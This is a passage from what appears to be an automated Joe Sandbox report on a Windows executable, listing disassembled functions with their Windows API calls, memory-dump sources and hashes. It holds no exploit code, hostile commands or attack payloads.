                                                                                                                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,AppData,00000000,?,?,?), ref: 004D0021
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 004D0043
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004CB0E0: GetVersionExA.KERNEL32 ref: 004CB0FB
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: OpenQueryValue$CloseVersion
                                                                                                                                                                                                                                                                                                        • String ID: AppData$AppData$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                                                                                                        • API String ID: 3944000476-502054578
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8db32938d79705165cc268b6cef819a2b1932c4d39244d564a2eda060a3e5bcd
                                                                                                                                                                                                                                                                                                        • Instruction ID: f72081d33d1e3e5e856db847e9c33e0e25e3821136d69a0383b26c3c547fa845
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8db32938d79705165cc268b6cef819a2b1932c4d39244d564a2eda060a3e5bcd
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0151B2715087017BC725DB50EC95FAB73E8AF88754F00891EF98553381EAB9D80AC7AA
                                                                                                                                                                                                                                                                                                        Function 004F5FC0 Relevance: 17.8, APIs: 14, Instructions: 252COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F606E
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F608D
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F6111
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F611B
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F612B
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F6135
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004F5CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5FEB,?,00000000,?,?,00000000,?), ref: 004F5CC0
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004F5CB0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CCE
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004F5CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CDE
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004F5CB0: LeaveCriticalSection.KERNEL32(?), ref: 004F5D07
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004F5CB0: EnterCriticalSection.KERNEL32(?), ref: 004F5D48
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004F5CB0: LeaveCriticalSection.KERNEL32(?), ref: 004F5D56
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000002,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F61D1
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F6212
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F621C
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F6244
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000001,00000002,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F6268
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F62A9
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F62B3
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F62DB
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 7e8666cb07b5cacadf35492099d50c0e827f2b9a1fadfb76ea06a7d0beb11ddf
                                                                                                                                                                                                                                                                                                        • Instruction ID: 143f1fb28292c6c8f5848ec82d72cb0c1768edffe3cb57bca7300ec5568bca4f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e8666cb07b5cacadf35492099d50c0e827f2b9a1fadfb76ea06a7d0beb11ddf
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2AA1113020430E8BC725DF349854BBBBBB9AF94304F15056EFA5687382DB79E809CB65
                                                                                                                                                                                                                                                                                                        Function 004D7EF0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • StartDocA.GDI32(?,00000000), ref: 004D7F29
                                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(?,00000008), ref: 004D7F47
                                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(?,0000000A), ref: 004D7F55
                                                                                                                                                                                                                                                                                                        • LPtoDP.GDI32(00000000,00000002), ref: 004D7F83
                                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000006E), ref: 004D7FA0
                                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000006F), ref: 004D7FAE
                                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 004D7FBC
                                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004D7FD2
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CapsDevice$Start
                                                                                                                                                                                                                                                                                                        • String ID: portrait
                                                                                                                                                                                                                                                                                                        • API String ID: 1738886688-2504013051
                                                                                                                                                                                                                                                                                                        • Opcode ID: 87bb50d4ff0b2b6bcd955025618aa84fe9db738b10e38e5fb2dd326402729996
                                                                                                                                                                                                                                                                                                        • Instruction ID: 78bfa520cedcb1c13f518f393ea8421dc938ea51f70754ce75912898c89e0c82
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 87bb50d4ff0b2b6bcd955025618aa84fe9db738b10e38e5fb2dd326402729996
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7641DFB0604B109FC324DF2AD980A1AFBF5BF98710F108A1EE58A877A1D771E845CF91
                                                                                                                                                                                                                                                                                                        Function 004F7040 Relevance: 15.3, APIs: 10, Instructions: 296timeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,?,00000000,00000000,?,004AC0BD,?,?), ref: 004F705A
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F7081
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F709A
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F70A3
                                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM(00000000,00000000,00000000,00000000,?), ref: 004F7390
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?), ref: 004F73D5
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Leave$Enter$Timetime
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4022644143-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 619e67b58965c9b6edfd0f45f913366b2bb88d2215bcce8f286a8ccc74bc94e1
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3d57daaa4b40982c2e4bbac1192c2a7fdd3e5fb289d79a2cbb097eeb1d58369f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 619e67b58965c9b6edfd0f45f913366b2bb88d2215bcce8f286a8ccc74bc94e1
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60A12B303083495BC7259F398890BBBBBE59F85700F04456EFA9AC7392DB6CE905D768
                                                                                                                                                                                                                                                                                                        Function 004F2A10 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 79timeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,00000000,004F7352,?), ref: 004F2A19
                                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM ref: 004F2A25
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F2A39
                                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM(?), ref: 004F2A46
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F2AD7
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$LeaveTimetime$Enter
                                                                                                                                                                                                                                                                                                        • String ID: NetStream.Buffer.Empty$NetStream.Buffer.Full$status
                                                                                                                                                                                                                                                                                                        • API String ID: 2943255653-4242577526
                                                                                                                                                                                                                                                                                                        • Opcode ID: 2800b6424f4894067f550383054d91bd5e105dc9488e734664937b715ac8d418
                                                                                                                                                                                                                                                                                                        • Instruction ID: adfbc573f46a5ae42de3eb127535f59d6c3a8125dfae6686c248f3bcdabba04f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2800b6424f4894067f550383054d91bd5e105dc9488e734664937b715ac8d418
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 33217471740705ABD7308F14DD86B6BB7A4FB50B21F24462BF267966D0C7B4B8408754
                                                                                                                                                                                                                                                                                                        Function 004F3EC0 Relevance: 13.7, APIs: 9, Instructions: 245COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5B64,00000002), ref: 004F3ED0
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F3EDE
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F3F20
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2978645861-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 34f8658622f1aa9e900f4973e8c3da322a382f9696d29d907fda60f1af10eeb7
                                                                                                                                                                                                                                                                                                        • Instruction ID: 85195bc957575009e4a7604c5a43e45099f91f30af12cfc7e5b33174ac27f883
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34f8658622f1aa9e900f4973e8c3da322a382f9696d29d907fda60f1af10eeb7
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF81C0316047494FC724DF39989057BB7F1AF853117148A2FE6A787B81DB38E805CB68
                                                                                                                                                                                                                                                                                                        Function 00401170 Relevance: 13.6, APIs: 9, Instructions: 124timeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00401181
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004011B1
                                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM ref: 004011C5
                                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM ref: 004011D5
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004011E3
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0040122A
                                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM ref: 0040123E
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00401261
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0040129E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeaveTimetime
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3486229058-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5c08956a0c7860ec974705ddb8904b2646fc942159566fcab6cb5e79d3acde08
                                                                                                                                                                                                                                                                                                        • Instruction ID: b4a63a4f06c8fcffd2d454e61e85ed039b73bf68413dd997414ba6e559c29426
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5c08956a0c7860ec974705ddb8904b2646fc942159566fcab6cb5e79d3acde08
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6641D6357003148FCB309F60E80466BB7F4AF6575470486AEE896BB3E1DB38EC459AA5
                                                                                                                                                                                                                                                                                                        Function 00411A80 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 394COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • InterlockedExchange.KERNEL32(00000020,00000000), ref: 00411B68
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ExchangeInterlocked
                                                                                                                                                                                                                                                                                                        • String ID: GET$_bytesLoaded$_bytesTotal$_customHeaders$contentType$loaded
                                                                                                                                                                                                                                                                                                        • API String ID: 367298776-2876428247
                                                                                                                                                                                                                                                                                                        • Opcode ID: bc7a406daf2fbb0983bef868be79dd6fb756b60b2efaa2edd4b44b4e4be769b1
                                                                                                                                                                                                                                                                                                        • Instruction ID: 337a073203a489cf9af6a636d5e82807fd5ac3b12a53b57697a6972a4ae57270
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc7a406daf2fbb0983bef868be79dd6fb756b60b2efaa2edd4b44b4e4be769b1
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F6D126706047056BC714EF65D842AABB7E5BF88304F404A2EFA4687392EB38F945C799
                                                                                                                                                                                                                                                                                                        Function 0079E841 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • type_info::operator==.LIBVCRUNTIME ref: 0079E960
                                                                                                                                                                                                                                                                                                        • ___TypeMatch.LIBVCRUNTIME ref: 0079EA6E
                                                                                                                                                                                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 0079EBC0
                                                                                                                                                                                                                                                                                                        • CallUnexpected.LIBVCRUNTIME ref: 0079EBDB
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000003.1903619913.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_3_770000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                                        • API String ID: 2751267872-393685449
                                                                                                                                                                                                                                                                                                        • Opcode ID: 239a4af11f55f81595298fdd8f27fa6654470999d4af52818c577849b92c20b2
